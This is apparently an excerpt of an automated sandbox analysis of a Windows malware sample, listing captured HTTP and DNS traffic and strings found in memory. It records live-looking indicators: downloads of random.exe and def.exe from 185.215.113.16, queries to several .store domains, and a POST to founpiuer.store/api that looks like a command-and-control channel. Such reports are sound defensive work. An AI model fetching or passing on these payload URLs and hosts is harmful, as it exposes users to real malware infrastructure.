            Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
            Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: </section>`}function Cce(e=ew,t=mp){return al($4,e,t)}function kce(e=iw,t=rw){return al(n4,e,t)}var yI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yI||{}),SRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function Lx(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(yI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(X7.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: </section>`}function Cce(e=ew,t=mp){return al($4,e,t)}function kce(e=iw,t=rw){return al(n4,e,t)}var yI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yI||{}),SRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function Lx(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(yI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(X7.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: </section>`}function Cce(e=ew,t=mp){return al($4,e,t)}function kce(e=iw,t=rw){return al(n4,e,t)}var yI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yI||{}),SRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function Lx(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(yI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(X7.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
            Source: global trafficDNS traffic detected: DNS query: presticitpo.store
            Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
            Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
            Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
            Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
            Source: global trafficDNS traffic detected: DNS query: founpiuer.store
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
            Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: founpiuer.store
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 06 Nov 2024 13:38:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZlLxsEOtGHTcyeA9Fmqjuzc1O4eUunw2o4pkd0TjwM4eF5U5FYleyOAk%2BLi0NaIfMvKXN0KXVtfXdA6T1yNVyRCPCdyoeOrhhxN%2BrpKOXKgmSHyEEZClAX9e%2B4aW0EoVbkU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8de57ca9bf253aaf-DFW
            Source: file.exe, file.exe, 00000000.00000003.2346828021.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2383361557.0000000000D56000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2265417496.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
            Source: file.exe, 00000000.00000002.2381732289.0000000000AFA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe.exe
            Source: file.exe, file.exe, 00000000.00000003.2346828021.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2383361557.0000000000D56000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2265417496.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
            Source: file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: file.exe, 00000000.00000003.2346557356.000000000585A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2394785291.000000000585A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.microsof
            Source: file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
            Source: chromecache_129.5.drString found in binary or memory: http://schema.org/Organization
            Source: file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://aka.ms/certhelp
            Source: chromecache_129.5.dr, chromecache_93.5.dr, chromecache_130.5.drString found in binary or memory: https://aka.ms/feedback/report?space=61
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://aka.ms/msignite_docs_banner
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://aka.ms/pshelpmechoose
            Source: chromecache_129.5.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
            Source: chromecache_129.5.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
            Source: chromecache_129.5.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
            Source: file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://channel9.msdn.com/
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
            Source: file.exe, 00000000.00000003.2105490606.0000000000D64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: file.exe, 00000000.00000003.2189581172.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2143646950.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2047732562.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2135876339.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105490606.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2062812324.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074760157.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2061520618.0000000000D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://founpiuer.store/
            Source: file.exe, 00000000.00000003.2109025654.00000000057B1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2189751100.00000000057B1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2189791423.00000000057B3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129039550.00000000057B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://founpiuer.store/api
            Source: file.exe, 00000000.00000003.2029250891.0000000000D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://founpiuer.store/apiW
            Source: file.exe, 00000000.00000003.2109025654.00000000057B1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2189751100.00000000057B1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2189791423.00000000057B3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129039550.00000000057B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://founpiuer.store/apider
            Source: chromecache_129.5.drString found in binary or memory: https://github.com/Thraka
            Source: chromecache_129.5.drString found in binary or memory: https://github.com/Youssef1313
            Source: chromecache_129.5.drString found in binary or memory: https://github.com/adegeo
            Source: chromecache_129.5.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
            Source: chromecache_129.5.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
            Source: chromecache_129.5.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
            Source: chromecache_129.5.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://github.com/dotnet/try
            Source: chromecache_129.5.drString found in binary or memory: https://github.com/gewarren
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://github.com/js-cookie/js-cookie
            Source: chromecache_129.5.drString found in binary or memory: https://github.com/mairaw
            Source: chromecache_129.5.drString found in binary or memory: https://github.com/nschonni
            Source: file.exe, 00000000.00000003.2105490606.0000000000D64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIz
            Source: chromecache_129.5.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
            Source: chromecache_95.5.drString found in binary or memory: https://schema.org
            Source: file.exe, 00000000.00000003.2076271463.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: file.exe, 00000000.00000003.2076271463.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
            Source: chromecache_95.5.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
            Source: file.exe, 00000000.00000003.2105490606.0000000000D64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&re0
            Source: file.exe, 00000000.00000003.2029094073.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2029739243.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
            Source: file.exe, 00000000.00000003.2029739243.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-mana1
            Source: file.exe, 00000000.00000003.2029094073.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
            Source: file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: chromecache_115.5.dr, chromecache_95.5.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
            Source: file.exe, 00000000.00000003.2076271463.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: file.exe, 00000000.00000003.2076271463.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
